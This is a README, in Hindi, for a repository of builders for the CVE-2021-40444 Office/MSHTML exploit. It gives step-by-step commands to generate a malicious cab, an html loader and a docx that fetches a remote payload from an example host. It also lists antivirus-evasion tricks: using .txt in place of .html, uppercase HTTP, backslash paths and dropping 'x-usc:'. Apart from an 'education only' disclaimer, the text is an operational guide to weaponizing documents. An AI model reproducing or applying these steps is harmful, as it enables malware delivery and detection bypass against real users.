
इस रिपॉजिटरी में CVE-2021-40444 एक्सप्लॉइट के लिए cab फ़ाइल, html फ़ाइल और docx फ़ाइल के निर्माता शामिल हैं।
CVE-2021-40444 बिल्डर्स
इस रिपॉजिटरी में CVE-2021-40444 एक्सप्लॉइट के लिए cab फ़ाइल, html फ़ाइल और docx फ़ाइल के बिल्डर शामिल हैं। यह रिपॉजिटरी केवल परीक्षण, अनुसंधान और शैक्षिक उद्देश्यों के लिए है। इस रिपॉजिटरी में दिए गए कोड का उपयोग आप कैसे करते हैं, इसकी जिम्मेदारी आपकी है।
यह कोड जंगली में पाए गए मैलवेयर नमूनों को रिवर्स इंजीनियर करके और विभिन्न सुरक्षा शोधकर्ताओं द्वारा साझा करके विकसित किया गया है।
इस CVE के बिल्डर पहले से ही सार्वजनिक हैं। इस रिपॉजिटरी का उद्देश्य यह जांचना है कि लेखन के समय हम विभिन्न AV विक्रेताओं द्वारा docx फ़ाइलों के लिए स्थैतिक डिटेक्शन को कितनी प्रभावी ढंग से बायपास कर सकते हैं।
JS कोड को आसानी से ऑनलाइन टूल्स या मैन्युअल रूप से ओबफस्केट किया जा सकता है। लेकिन docx फ़ाइल में केवल एक फ़ाइल होती है जो document.xml.rels है, जिस पर हस्ताक्षर आधारित हो सकते हैं। हम इसमें क्या छेड़छाड़ कर सकते हैं ताकि अधिकांश AV के स्थैतिक डिटेक्शन से बच सकें।
cabrc.exe Microsoft का एक्ज़ीक्यूटेबल है जो Internet Explorer Administration Kit में शामिल है और https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads से डाउनलोड किया जा सकता है और इंस्टॉलेशन के बाद आपको यह exe "C:\Program Files (x86)\Windows IEAK 11" में मिलेगा।
यहाँ 3 बिल्डर हैं।
कोड python 2.7 के लिए काम करता है।
पहले CVE-2021-40444 फ़ोल्डर में जाएं और अपनी dll फ़ाइल वहां रखें और इसका नाम बदलकर IEcache.inf करें (या आप वहां पहले से मौजूद calc dll का उपयोग कर सकते हैं)।
फिर source फ़ोल्डर में जाएं और cab फ़ाइल जनरेट करें
c:\cve-2021-40444\sources\python generate_cab.py
अपनी cab फ़ाइल अपलोड करें, और cab फ़ाइल URL का उपयोग करके html फ़ाइल जनरेट करें
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (ध्यान दें कि html एक्सटेंशन के बजाय, यदि हम .txt का उपयोग करते हैं तो एक्सप्लॉइट फिर भी काम करता है, लेकिन AV को बायपास करता है)
अब अंत में अपनी html फ़ाइल अपलोड करें और doc फ़ाइल जनरेट करें। AV को बायपास करने के लिए http के बजाय HTTP (कैपिटल) का उपयोग करें, और "/" के बजाय "" का उपयोग करें। और हमें x-usc: की भी आवश्यकता नहीं है।
उदाहरण: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
परिणाम आपके सामने है।
